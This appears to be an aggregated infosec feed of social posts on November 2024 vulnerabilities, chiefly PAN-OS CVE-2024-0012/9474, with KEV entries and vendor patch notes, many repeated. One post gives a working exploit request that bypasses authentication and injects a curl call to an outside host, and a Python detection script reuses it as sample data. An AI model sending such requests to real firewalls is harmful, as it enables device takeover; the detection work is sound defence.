##Curious about CVE-2024-0012 - PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)
The overall sighting gives a good timeline of activities concerning the vulnerability.
🔗 https://vulnerability.circl.lu/vuln/CVE-2024-0012#sightings
#infosec #opensource #cybersecurity #vulnerability #paloalto
##Weeeeeee
I don’t know why Palo-Alto changed the CVEs at the last minute to remove reference to RCE. It’s remote code execution. https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
##Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 - watchTowr Labs https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
##CISA Adds Three Critical Vulnerabilities to the Known Exploited Vulnerabilities Catalog
CISA adds CVE-2024-1212, CVE-2024-0012, and CVE-2024-9474 to the Known Exploited Vulnerabilities Catalog (KEV).
🔗️ [Cyble] https://link.is.it/so5jib
##The way Palo Alto Networks has handled information disclosure regarding CVE-2024-0012 has been terrible 😬
##@catc0n I noticed the disparity between the CVE-2024-9474 advisory description "privilege escalation vulnerability" and CISA's KEV Catalog name "Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability"
Palo Alto Networks discarded the verbiage from Thursday "unauthenticated remote command execution vulnerability" and divided the unauth RCE into 2 separate vulnerabilities, while stating that one would allow for the other.
So authentication bypass to admin (CVE-2024-0012), then authenticated privesc from admin to root (CVE-2024-9474).
Unit 42 skipped talking about CVE-2024-9474.
The CVSSv4 vector is CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:A/AU:N/R:U/V:C/RE:H/U:Red
I think the real takeaway is that only Integrity is impacted. Everything else appears to be the consequence of having root privileges on a firewall.
##@shadowserver IOCs provided by Unit 42: https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
CVEs were added to CISA's KEV Catalog: https://www.cisa.gov/news-events/alerts/2024/11/18/cisa-adds-three-known-exploited-vulnerabilities-catalog
###CISA has updated the KEV catalogue:
- CVE-2024-1212: Progress Kemp LoadMaster OS Command Injection Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-1212
- CVE-2024-0012: Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-0012
- CVE-2024-9474: Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-9474 @cisacyber #cybersecurity #infosec #PaloAlto
##CVE ID: CVE-2024-0012
Vendor: Palo Alto Networks
Product: PAN-OS
Date Added: 2024-11-18
Vulnerability: Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
Notes: https://security.paloaltonetworks.com/CVE-2024-0012 ; https://nvd.nist.gov/vuln/detail/CVE-2024-0012
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-0012
#PaloAlto has updated its security advisories: https://security.paloaltonetworks.com/
- CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface https://security.paloaltonetworks.com/CVE-2024-0012
- CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface @paloaltontwks #cybersecurity #infosec
##Attackers are exploiting 2 zero-days in Palo Alto Networks firewalls (CVE-2024-0012, CVE-2024-9474) https://www.helpnetsecurity.com/2024/11/18/cve-2024-0012-cve-2024-9474/ #PaloAltoNetworks #enterprise #Don'tmiss #Hotstuff #firewall #0-day #News #CVE
##Palo Alto Networks has released fixes for two vulnerabilities (CVE-2024-0012 and CVE-2024-9474) in its next-generation firewalls that have been exploited by attackers as zero-days.
CVE-2024-0012 is the (previously unspecified) unauthenticated remote command execution zero-day that the company started warning about ten days ago.
https://www.helpnetsecurity.com/2024/11/18/cve-2024-0012-cve-2024-9474/
##@screaminggoat "Palo Alto Networks and Unit 42 are engaged in tracking a limited set of exploitation activity related to CVE-2024-0012 and are working with external researchers, partners, and customers to share information transparently and rapidly." 🤔
https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
##Palo Alto Unit42 Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/ @unit42_intel #cybersecurity #infosec
##@neurovagrant start your Monday off with exploited zero-days:
##@therecord_media @jwarminsky @jgreig can this news article be updated to include the two CVE IDs?: CVE-2024-0012 and CVE-2024-9474
##Huh. So PAN apparently released sigs to cover a critical vuln in the PAN-OS web management interface. Could this finally be it? They list it as CVE-2024-0012 and link to the advisory.
Well, the link is broken, but maybe it's just not published yet: https://security.paloaltonetworks.com/CVE-2024-0012
Let's take a look at that CVE on cve.org: https://www.cve.org/CVERecord?id=CVE-2024-0012
Oh, still says reserved. Maybe they meant their own advisory number of PAN-SA-2024-0012: https://security.paloaltonetworks.com/PAN-SA-2024-0012
No, that doesn't make sense. That's about a bunch of OSS CVEs that are not even confirmed to be impacting PAN-OS.
So here we are once again with PAN using lots of words to say nothing. *sigh*
I need more coffee.
##updated 2024-11-19T17:16:40.513000
51 posts
1 repos
##How to hack a #PaloAlto firewall:
POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1
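Added example (not from any post above, and not Palo Alto Networks or watchTowr code): a triage script for raw HTTP requests captured in front of a PAN-OS management interface, covering both indicators described in the watchTowr root-cause summary and visible in the request posted above: the X-PAN-AUTHCHECK: off header (CVE-2024-0012) and shell metacharacters in the `user` field sent to createRemoteAppwebSession.php (CVE-2024-9474). The header, endpoint and parameter names come from the posts; the attacker address 192.0.2.10, the hostname and the three sample requests are constructed for illustration.

```python
"""Flag PAN-OS management-interface requests carrying the indicators of
CVE-2024-0012 (X-PAN-AUTHCHECK: off) and CVE-2024-9474 (shell metacharacters
in the user parameter of createRemoteAppwebSession.php).
"""
import re
from urllib.parse import parse_qs

AUTH_BYPASS_HEADER = "x-pan-authcheck"
SESSION_ENDPOINT = "/php/utils/createremoteappwebsession.php"
# Characters that end a shell word or start a substitution; any of them in a
# value that reaches a shell command line is a command-injection attempt.
SHELL_META = re.compile(r"[`$;|&<>(){}\n\r]")


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, headers, body).
    Header names are lower-cased; the query string is dropped from the path."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    parts = request_line.split(" ")
    method, target = parts[0], parts[1] if len(parts) > 1 else ""
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    path = target.split("?", 1)[0]
    return method.upper(), path, headers, body


def triage(raw: str) -> list[str]:
    """Return one finding string per indicator seen in the request."""
    method, path, headers, body = parse_request(raw)
    findings = []
    if headers.get(AUTH_BYPASS_HEADER, "").lower() == "off":
        findings.append("CVE-2024-0012: X-PAN-AUTHCHECK: off sent by client")
    # Prefix match: the posted request appends /aaaa.js.map as extra path
    # info after the script name, so an exact path comparison would miss it.
    if method == "POST" and path.lower().startswith(SESSION_ENDPOINT):
        params = parse_qs(body, keep_blank_values=True)  # decodes %60 and '+'
        user = params.get("user", [""])[0]
        if SHELL_META.search(user):
            findings.append(f"CVE-2024-9474: shell metacharacters in user={user!r}")
        if params.get("userRole", [""])[0] == "superuser":
            findings.append("session forged with userRole=superuser")
    return findings


# Constructed sample requests (not real captures).
EXPLOIT_REQUEST = (
    "POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1\r\n"
    "Host: fw-mgmt.example.internal\r\n"
    "X-PAN-AUTHCHECK: off\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "user=`curl http://192.0.2.10/p`&userRole=superuser&remoteHost=&vsys=vsys1"
)
# Same payload with backticks and the space percent-encoded, as an HTTP
# client library would send it; header name in a different case.
ENCODED_REQUEST = (
    "POST /php/utils/createRemoteAppwebSession.php HTTP/1.1\r\n"
    "Host: fw-mgmt.example.internal\r\n"
    "x-pan-authcheck: OFF\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "user=%60curl+http%3A%2F%2F192.0.2.10%2Fp%60&userRole=superuser&remoteHost=&vsys=vsys1"
)
BENIGN_REQUEST = (
    "POST /php/login.php HTTP/1.1\r\n"
    "Host: fw-mgmt.example.internal\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "user=admin&passwd=REDACTED"
)

if __name__ == "__main__":
    for name, req in [("exploit", EXPLOIT_REQUEST), ("encoded", ENCODED_REQUEST),
                      ("benign", BENIGN_REQUEST)]:
        print(name, triage(req) or ["no indicators"])
```

Ordinary web-server access logs do not record request headers or POST bodies, so this needs a proxy, WAF or packet capture in front of the management interface; the Unit 42 indicators linked above remain the check for a device that may already have been reached.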
##Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited https://thecyberexpress.com/palo-alto-pan-os-two-bugs-under-exploitation/ #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS
##Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
#CVE_2024_0012 #CVE_2024_9474
https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
##CVE ID: CVE-2024-9474
Vendor: Palo Alto Networks
Product: PAN-OS
Date Added: 2024-11-18
Vulnerability: Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
Notes: https://security.paloaltonetworks.com/CVE-2024-9474 ; https://nvd.nist.gov/vuln/detail/CVE-2024-9474
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-9474
#PaloAlto has updated its security advisories: https://security.paloaltonetworks.com/
- CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface https://security.paloaltonetworks.com/CVE-2024-0012
- CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface @paloaltontwks #cybersecurity #infosec
##Attackers are exploiting 2 zero-days in Palo Alto Networks firewalls (CVE-2024-0012, CVE-2024-9474) https://www.helpnetsecurity.com/2024/11/18/cve-2024-0012-cve-2024-9474/ #PaloAltoNetworks #enterprise #Don'tmiss #Hotstuff #firewall #0-day #News #CVE
##Palo Alto Networks has released fixes for two vulnerabilities (CVE-2024-0012 and CVE-2024-9474) in its next-generation firewalls that have been exploited by attackers as zero-days.
CVE-2024-0012 is the (previously unspecified) unauthenticated remote command execution zero-day that the company started warning about ten days ago.
https://www.helpnetsecurity.com/2024/11/18/cve-2024-0012-cve-2024-9474/
##@screaminggoat "Palo Alto Networks and Unit 42 are engaged in tracking a limited set of exploitation activity related to CVE-2024-0012 and are working with external researchers, partners, and customers to share information transparently and rapidly." 🤔
https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
##Palo Alto Unit42 Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/ @unit42_intel #cybersecurity #infosec
##@neurovagrant start your Monday off with exploited zero-days:
##@therecord_media @jwarminsky @jgreig can this news article be updated to include the two CVE IDs?: CVE-2024-0012 and CVE-2024-9474
##updated 2024-11-19T15:32:55
1 posts
1 repos
Mozilla Foundation security advisories:
No mention of exploitation
#mozilla #thunderbird #vulnerability #CVE #infosec #cybersecurity
##updated 2024-11-19T03:40:15.550000
1 posts
Some fairly interesting stuff for this #PatchTuesday!
Of particular note for me, a 9.9 in Azure CycleCloud (CVE-2024-43602), a Windows AppContainer escape (CVE-2024-49039), and a RCE in .NET/Visual Studio (CVE-2024-43498)? That one needs more detail.
https://www.zerodayinitiative.com/blog/2024/11/12/the-november-2024-security-update-review
##updated 2024-11-18T23:41:15
3 posts
1 repos
Finally got to publish the CVE for a "forever-day" path traversal in the .NET library DotNetZip affecting all releases since 2018. Enjoy, the PoC is in the patch! :blobcatsuit: #CVE_2024_48510
##updated 2024-11-18T22:20:32.157000
3 posts
@winterknight1337 @Viss https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43639
##@screaminggoat https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43639 👀
##CVE-2024-43639 looks interesting. Critical RCE in Kerberos? Nice.
##updated 2024-11-18T20:08:45
4 posts
CVE Alert: CVE-2023-1419 - https://www.redpacketsecurity.com/cve_alert_cve-2023-1419/
##updated 2024-11-18T20:08:31
4 posts
CVE Alert: CVE-2023-4639 - https://www.redpacketsecurity.com/cve_alert_cve-2023-4639/
##updated 2024-11-18T20:08:26
4 posts
CVE Alert: CVE-2023-6110 - https://www.redpacketsecurity.com/cve_alert_cve-2023-6110/
##updated 2024-11-18T18:32:00
1 posts
1 repos
💡AnyDesk IP Leak Vulnerability CVE-2024-52940
https://darkwebinformer.com/anydesk-ip-leak-vulnerability-cve-2024-52940/
##updated 2024-11-18T17:28:40
4 posts
CVE Alert: CVE-2023-0657 - https://www.redpacketsecurity.com/cve_alert_cve-2023-0657/
##updated 2024-11-17T15:30:52
4 posts
1 repos
CVE Alert: CVE-2023-43091 - https://www.redpacketsecurity.com/cve_alert_cve-2023-43091/
##updated 2024-11-17T12:30:36
4 posts
CVE Alert: CVE-2020-25720 - https://www.redpacketsecurity.com/cve_alert_cve-2020-25720/
##updated 2024-11-15T21:30:53
2 posts
1 repos
This was added to #Microsoft's advisories yesterday:
Security vulnerability for Arc VMs running on #Azure Stack HCI, version 23H2 https://github.com/Azure/AzureStackHCI-Supportability/blob/main/TSG/ArcVMs/security-vulnerability-cve-2024-49060.md #cybersecurity #Infosec
##Microsoft Security Response Center (MSRC): CVE-2024-49060
Leave it to Microsoft to drop an out-of-band vulnerability outside of Patch Tuesday. CVE-2024-49060 (8.8 high) Azure Stack HCI Elevation of Privilege Vulnerability. Not Exploited, not Publicly disclosed, Exploitation More Likely. Read the FAQ for explanation of AV:L and S:C.
#microsoft #vulnerability #cve #infosec #cybersecurity #azure
##updated 2024-11-15T15:31:04
1 posts
1 repos
🚨CVE-2024-50986: DLL Hijacking Exploit for Clementine
https://darkwebinformer.com/cve-20224-50986-dll-hijacking-exploit-for-clementine/
##updated 2024-11-15T14:39:34.863000
10 posts
1 repos
CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog https://cyble.com/blog/cisa-adds-two-critical-palo-alto-networks-vulnerabilities-to-known-exploited-catalog/ #OSCommandInjection #Vulnerability #CVE20249463 #CVE20249465 #CISA
##CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog
Not quite hot, but I was stuck in meetings. CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
#cisa #cisakev #vulnerability #kev #knownexploitedvulnerabilitiescatalog #CVE_2024_9463 #CVE_2024_9465 #cve #paloaltonetworks #pan #infosec #cybersecurity
##CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog
CISA has added CVE-2024-9463 and CVE-2024-9465 to its KEV catalog. These critical vulnerabilities in Palo Alto Networks Expedition are actively...
🔗️ [Cyble] https://link.is.it/qfqgxi
##Palo Alto Networks firewalls, Expedition under attack (CVE-2024-9463, CVE-2024-9465) https://www.helpnetsecurity.com/2024/11/15/cve-2024-9463-cve-2024-9465/ #configurationmanagement #PaloAltoNetworks #Horizon3.ai #enterprise #Don'tmiss #Hotstuff #firewall #Censys #News #CISA
##Another SQL injection vuln. Not the last. Why? Well, part of the prob is we don't teach secure coding in most programing curriculums and companies hiring programmers don't require that programmers have secure coding skills. Time to maybe do this things?
##CVE ID: CVE-2024-9465
Vendor: Palo Alto Networks
Product: Expedition
Date Added: 2024-11-14
Vulnerability: Palo Alto Networks Expedition SQL Injection Vulnerability
Notes: https://security.paloaltonetworks.com/PAN-SA-2024-0010 ; https://nvd.nist.gov/vuln/detail/CVE-2024-9465
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-9465
##updated 2024-11-15T02:00:01.687000
9 posts
1 repos
CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog https://cyble.com/blog/cisa-adds-two-critical-palo-alto-networks-vulnerabilities-to-known-exploited-catalog/ #OSCommandInjection #Vulnerability #CVE20249463 #CVE20249465 #CISA
##CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog
Not quite hot, but I was stuck in meetings. CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
#cisa #cisakev #vulnerability #kev #knownexploitedvulnerabilitiescatalog #CVE_2024_9463 #CVE_2024_9465 #cve #paloaltonetworks #pan #infosec #cybersecurity
##CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog
CISA has added CVE-2024-9463 and CVE-2024-9465 to its KEV catalog. These critical vulnerabilities in Palo Alto Networks Expedition are actively...
🔗️ [Cyble] https://link.is.it/qfqgxi
##Palo Alto Networks firewalls, Expedition under attack (CVE-2024-9463, CVE-2024-9465) https://www.helpnetsecurity.com/2024/11/15/cve-2024-9463-cve-2024-9465/ #configurationmanagement #PaloAltoNetworks #Horizon3.ai #enterprise #Don'tmiss #Hotstuff #firewall #Censys #News #CISA
##CVE ID: CVE-2024-9463
Vendor: Palo Alto Networks
Product: Expedition
Date Added: 2024-11-14
Vulnerability: Palo Alto Networks Expedition OS Command Injection Vulnerability
Notes: https://security.paloaltonetworks.com/PAN-SA-2024-0010 ; https://nvd.nist.gov/vuln/detail/CVE-2024-9463
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-9463
##updated 2024-11-14T22:45:14
1 posts
Jenkins Security Advisory 2024-11-13
No mention of exploitation.
##updated 2024-11-14T22:45:13
1 posts
Jenkins Security Advisory 2024-11-13
No mention of exploitation.
##updated 2024-11-14T21:32:11
1 posts
1 repos
Microsoft Edge security advisory: Release notes for Microsoft Edge Security Updates
This isn't live yet, but the security advisories for related Chromium vulnerabilities are hitting the RSS feed.
CVE-2024-11110 through CVE-2024-11117 (originally announced by Google on Tuesday) are now patched in Microsoft Edge version 131.0.2903.48. There's a new CVE that is Edge-specific: CVE-2024-49025 (5.4 medium) Microsoft Edge (Chromium-based) Information Disclosure Vulnerability. It allows for an email or web-based attack scenario where a user has to open a specially crafted file, and information in the victim's browser associated with the vulnerable URL (e.g. Personally Identifiable Information) can be read by the malicious JavaScript code and sent to the attacker. Not exploited, not publicly disclosed, and exploitation is less likely.
#msrc #chrome #chromium #vulnerability #CVE_2024_49025 #edge #cve #patchtuesday
##updated 2024-11-14T18:30:34
3 posts
1 repos
The second Citrix security advisory Citrix Session Recording Security Bulletin for CVE-2024-8068 and CVE-2024-8069 appears to be the same vulnerabilities mentioned in yesterday's watchTowr blog post Visionaries Have Democratised Remote Network Access - Citrix Virtual Apps and Desktops (CVE Unknown), based on the credits/acknowledgement to watchTowr, description of vulnerabilities, and the affected products. At the time of this toot, watchTowr has not updated their blog post to include the CVE IDs.
#Citrix #vulnerability #virtualappsanddesktops #cve #infosec #cybersecurity #watchtowr
##If you present Citrix StoreFront aka Citrix StoreWeb directly to the internet and enabled session recording, you will want to drop everything and install patches for CVE-2024-8068 and CVE-2024-8069. People are already scanning for it (no signs of exploitation).
It’s a niche scenario for direct internet access.
Vendor advisory: https://support.citrix.com/s/article/CTX691941-citrix-session-recording-security-bulletin-for-cve20248068-and-cve20248069?language=en_US
Technical write up: https://labs.watchtowr.com/visionaries-at-citrix-have-democratised-remote-network-access-citrix-virtual-apps-and-desktops-cve-unknown/
Shodan dork: https://beta.shodan.io/search?query=html%3A%22StoreWeb%2F%22
Citrix have used terms like “limited RCE” and “intranet” 🤨
##Happy #PatchTuesday from Citrix:
Please see the advisories for the prerequisites for each vulnerability.
#Citrix #NetScaler #CVE #vulnerability #infosec #cybersecurity
##updated 2024-11-14T18:30:33
1 posts
A new vulnerability on IPv6 parsing in linux https://nvd.nist.gov/vuln/detail/CVE-2024-50252
##updated 2024-11-14T15:42:42
1 posts
Jenkins Security Advisory 2024-11-13
No mention of exploitation.
##updated 2024-11-14T15:41:49
1 posts
Jenkins Security Advisory 2024-11-13
No mention of exploitation.
##updated 2024-11-14T15:37:53
1 posts
Jenkins Security Advisory 2024-11-13
No mention of exploitation.
##updated 2024-11-14T15:35:55
1 posts
Jenkins Security Advisory 2024-11-13
No mention of exploitation.
##updated 2024-11-14T15:32:22
2 posts
1 repos
Reproducing CVE-2024-10979: A Step-by-Step Guide: https://redrays.io/blog/reproducing-cve-2024-10979-a-step-by-step-guide/
##updated 2024-11-14T15:32:22
1 posts
1 repos
GitLab security advisory: GitLab Patch Release: 17.5.2, 17.4.4, 17.3.7
No mention of exploitation.
#GitLab #PatchTuesday #CVE #vulnerability #infosec #cybersecurity
##updated 2024-11-14T15:32:16
1 posts
GitLab security advisory: GitLab Patch Release: 17.5.2, 17.4.4, 17.3.7
No mention of exploitation.
#GitLab #PatchTuesday #CVE #vulnerability #infosec #cybersecurity
##updated 2024-11-14T12:31:09
1 posts
Happy #PatchTuesday on a Wednesday from Palo Alto Networks:
"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."
##updated 2024-11-14T12:31:08
1 posts
Happy #PatchTuesday on a Wednesday from Palo Alto Networks:
"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."
##updated 2024-11-14T12:31:08
1 posts
Happy #PatchTuesday on a Wednesday from Palo Alto Networks:
"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."
##updated 2024-11-14T12:31:02
1 posts
Happy #PatchTuesday on a Wednesday from Palo Alto Networks:
"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."
##updated 2024-11-14T12:31:02
1 posts
Happy #PatchTuesday on a Wednesday from Palo Alto Networks:
"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."
##updated 2024-11-14T12:31:02
1 posts
Happy #PatchTuesday on a Wednesday from Palo Alto Networks:
"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."
##updated 2024-11-14T12:31:02
1 posts
1 repos
GitLab security advisory: GitLab Patch Release: 17.5.2, 17.4.4, 17.3.7
No mention of exploitation.
#GitLab #PatchTuesday #CVE #vulnerability #infosec #cybersecurity
##updated 2024-11-14T12:31:02
1 posts
GitLab security advisory: GitLab Patch Release: 17.5.2, 17.4.4, 17.3.7
No mention of exploitation.
#GitLab #PatchTuesday #CVE #vulnerability #infosec #cybersecurity
##updated 2024-11-14T12:31:01
1 posts
Happy #PatchTuesday on a Wednesday from Palo Alto Networks:
"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."
##updated 2024-11-14T12:31:01
1 posts
1 repos
Happy #PatchTuesday on a Wednesday from Palo Alto Networks:
"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."
##updated 2024-11-14T00:31:11
1 posts
Happy #PatchTuesday from Citrix:
Please see the advisories for the prerequisites for each vulnerability.
#Citrix #NetScaler #CVE #vulnerability #infosec #cybersecurity
##updated 2024-11-13T21:31:39
1 posts
2 repos
We (GreyNoise) have coverage for 3 of the 4 CVEs in today's CISA KEV Drop:
- ✅ CVE-2019-16278
- ✅ CVE-2024-51567
- ✅ CVE-2024-5910
- ❌ CVE-2024-43093
Hit up viz.greynoise.io for deets + real/useful/timely blocklists.
CVE-2024-43093 is client-side, hence no coverage.
##updated 2024-11-13T20:35:12.293000
1 posts
Happy #PatchTuesday from Citrix:
Please see the advisories for the prerequisites for each vulnerability.
#Citrix #NetScaler #CVE #vulnerability #infosec #cybersecurity
##updated 2024-11-13T18:33:06
1 posts
1 repos
Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) and 131.0.6778.69/.70 (Windows, Mac) bring 12 security fixes, 8 of which are externally reported. No mention of exploitation.
#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity
##updated 2024-11-13T18:33:05
2 posts
1 repos
Microsoft Edge security advisory: Release notes for Microsoft Edge Security Updates
This isn't live yet, but the security advisories for related Chromium vulnerabilities are hitting the RSS feed.
CVE-2024-11110 through CVE-2024-11117 (originally announced by Google on Tuesday) are now patched in Microsoft Edge version 131.0.2903.48. There's a new CVE that is Edge-specific: CVE-2024-49025 (5.4 medium) Microsoft Edge (Chromium-based) Information Disclosure Vulnerability. It allows for an email or web-based attack scenario where a user has to open a specially crafted file, and information in the victim's browser associated with the vulnerable URL (e.g. Personally Identifiable Information) can be read by the malicious JavaScript code and sent to the attacker. Not exploited, not publicly disclosed, and exploitation is less likely.
#msrc #chrome #chromium #vulnerability #CVE_2024_49025 #edge #cve #patchtuesday
##Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) and 131.0.6778.69/.70 (Windows, Mac) bring 12 security fixes, 8 of which are externally reported. No mention of exploitation.
#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity
##updated 2024-11-13T18:33:05
1 posts
1 repos
Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) and 131.0.6778.69/.70 (Windows, Mac) bring 12 security fixes, 8 of which are externally reported. No mention of exploitation.
#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity
##updated 2024-11-13T18:33:05
1 posts
1 repos
Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) and 131.0.6778.69/.70 (Windows, Mac) bring 12 security fixes, 8 of which are externally reported. No mention of exploitation.
#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity
##updated 2024-11-13T18:31:59
2 posts
1 repos
Microsoft Edge security advisory: Release notes for Microsoft Edge Security Updates
This isn't live yet, but the security advisories for related Chromium vulnerabilities are hitting the RSS feed.
CVE-2024-11110 through CVE-2024-11117 (originally announced by Google on Tuesday) are now patched in Microsoft Edge version 131.0.2903.48. There's a new CVE that is Edge-specific: CVE-2024-49025 (5.4 medium) Microsoft Edge (Chromium-based) Information Disclosure Vulnerability. It allows for an email or web-based attack scenario where a user has to open a specially crafted file, and information in the victim's browser associated with the vulnerable URL (e.g. Personally Identifiable Information) can be read by the malicious JavaScript code and sent to the attacker. Not exploited, not publicly disclosed, and exploitation is less likely.
#msrc #chrome #chromium #vulnerability #CVE_2024_49025 #edge #cve #patchtuesday
##Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) and 131.0.6778.69/.70 (Windows, Mac) bring 12 security fixes, 8 of which are externally reported. No mention of exploitation.
#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity
##updated 2024-11-13T18:31:59
3 posts
1 repos
The second Citrix security advisory Citrix Session Recording Security Bulletin for CVE-2024-8068 and CVE-2024-8069 appears to be the same vulnerabilities mentioned in yesterday's watchTowr blog post Visionaries Have Democratised Remote Network Access - Citrix Virtual Apps and Desktops (CVE Unknown), based on the credits/acknowledgement to watchTowr, description of vulnerabilities, and the affected products. At the time of this toot, watchTowr has not updated their blog post to include the CVE IDs.
#Citrix #vulnerability #virtualappsanddesktops #cve #infosec #cybersecurity #watchtowr
##If you present Citrix StoreFront aka Citrix StoreWeb directly to the internet and enabled session recording, you will want to drop everything and install patches for CVE-2024-8068 and CVE-2024-8069. People are already scanning for it (no signs of exploitation).
It’s a niche scenario for direct internet access.
Vendor advisory: https://support.citrix.com/s/article/CTX691941-citrix-session-recording-security-bulletin-for-cve20248068-and-cve20248069?language=en_US
Technical write up: https://labs.watchtowr.com/visionaries-at-citrix-have-democratised-remote-network-access-citrix-virtual-apps-and-desktops-cve-unknown/
Shodan dork: https://beta.shodan.io/search?query=html%3A%22StoreWeb%2F%22
Citrix have used terms like “limited RCE” and “intranet” 🤨
##Happy #PatchTuesday from Citrix:
Please see the advisories for the prerequisites for each vulnerability.
#Citrix #NetScaler #CVE #vulnerability #infosec #cybersecurity
##updated 2024-11-13T18:31:52
2 posts
1 repos
CVE ID: CVE-2014-2120
Vendor: Cisco
Product: Adaptive Security Appliance (ASA)
Date Added: 2024-11-12
Vulnerability: Cisco Adaptive Security Appliance (ASA) Cross-Site Scripting (XSS) Vulnerability
Notes: https://web.archive.org/web/20140403043510/http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014-2120 ; https://nvd.nist.gov/vuln/detail/CVE-2014-2120
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2014-2120
CISA: CISA Adds Five Known Exploited Vulnerabilities to Catalog
Hot off the press!
#cisa #kev #knownexploitedvulnerabilitiescatalog #cisakev #vulnerability #cve #eitw #activeexploitation #infosec #cybersecurity
##updated 2024-11-13T17:39:36.637000
2 posts
1 repos
CVE ID: CVE-2021-26086
Vendor: Atlassian
Product: Jira Server and Data Center
Date Added: 2024-11-12
Vulnerability: Atlassian Jira Server and Data Center Path Traversal Vulnerability
Notes: https://jira.atlassian.com/browse/JRASERVER-72695 ; https://nvd.nist.gov/vuln/detail/CVE-2021-26086
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2021-26086
